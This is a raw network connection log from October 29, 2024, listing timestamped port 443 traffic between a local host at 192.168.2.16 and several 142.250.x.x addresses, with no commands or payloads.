                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.412775993 CET44349827142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.413079023 CET49827443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.413139105 CET44349827142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.413204908 CET49827443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.415818930 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.415858030 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.415921926 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.416337013 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.416383028 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.416440010 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.416588068 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.416599989 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.416750908 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.416762114 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.417217970 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.417256117 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.417309046 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.417476892 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:02.417489052 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.289458990 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.291109085 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.291126013 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.292203903 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.292574883 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.292574883 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.292637110 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.292709112 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.292717934 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.302772045 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303050041 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303057909 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303411007 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303792953 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303852081 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303926945 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303961039 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.303972006 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.310846090 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.311084986 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.311103106 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.312140942 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.312428951 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.312582970 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.312582970 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.312593937 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.312642097 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.333786964 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.365755081 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.365775108 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.412811995 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.561757088 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.561794043 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.561885118 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.561903000 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.562715054 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.562762022 CET44349828142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.562813997 CET49828443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586710930 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586756945 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586785078 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586808920 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586832047 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586890936 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586890936 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.586962938 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.587039948 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.587461948 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.587517977 CET44349830142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.587579966 CET49830443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.591491938 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.591512918 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.591587067 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.591814041 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.591824055 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.592339993 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.592381954 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.592408895 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.592442036 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.592457056 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.592511892 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.593240023 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.593267918 CET44349829142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.593318939 CET49829443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.595428944 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.595506907 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.595601082 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.595799923 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.595828056 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599121094 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599127054 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599136114 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599153996 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599193096 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599250078 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599417925 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599430084 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599543095 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:03.599555016 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.455714941 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.456073046 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.456090927 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457272053 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457350016 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457643032 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457710028 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457791090 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457799911 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457839966 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.457865953 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.476700068 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.477071047 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.477099895 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.478250980 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.478332043 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.478611946 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.478697062 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.478770018 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.478780985 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.479018927 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.479234934 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.479249954 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.479588032 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.479933977 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.479990005 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.480063915 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.495683908 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.496018887 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.496046066 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.496395111 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.496701956 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.496757984 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.496829033 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.506779909 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.523334026 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.524095058 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.543333054 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726423025 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726505041 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726537943 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726563931 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726566076 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726576090 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726618052 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726629972 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726692915 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.726700068 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.727615118 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.727669001 CET44349833142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.727722883 CET49833443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.730532885 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.730571985 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.730664968 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.731004000 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.731013060 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.745028019 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.745119095 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.745206118 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.745237112 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746131897 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746176958 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746253967 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746340990 CET44349831142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746376991 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746401072 CET49831443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746577024 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.746586084 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.766405106 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.766855001 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.766905069 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.766912937 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.766927958 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.766973019 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.766979933 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.767328978 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.767357111 CET44349832142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.767463923 CET49832443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.850720882 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.850795031 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.850830078 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.850853920 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.850871086 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.850918055 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.850930929 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.851843119 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.851900101 CET44349834142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.851980925 CET49834443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.854624033 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.854661942 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.854741096 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.855000973 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:04.855015993 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.620289087 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.620699883 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.620714903 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.622514009 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.622612000 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.622920990 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.622987986 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.623096943 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.644535065 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.644920111 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.644948006 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.646008968 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.646116972 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.646523952 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.646584988 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.646713018 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.646724939 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.667335987 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.670732975 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.670748949 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.686765909 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.718760967 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.733834982 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.734215975 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.734246969 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.735338926 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.735425949 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.735727072 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.735804081 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.735874891 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.735888004 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.782798052 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.910511017 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.910564899 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.910594940 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.910686016 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.910705090 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.911087036 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.912195921 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.912239075 CET44349835142.250.184.228192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.912337065 CET49835443192.168.2.16142.250.184.228
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.914583921 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.914633036 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.914721012 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.914751053 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.915091991 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.915126085 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.915205956 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.915874958 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.915887117 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.915993929 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.916039944 CET44349836142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:05.916093111 CET49836443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.002012968 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.002074003 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.002127886 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.002171993 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.002209902 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.002258062 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.002985001 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.003025055 CET44349837142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.003099918 CET49837443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.787686110 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.788121939 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.788150072 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.789202929 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.789340973 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.789623976 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.789715052 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.789809942 CET49838443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.789819956 CET44349838142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:06.834747076 CET49838443192.168.2.16142.250.186.164
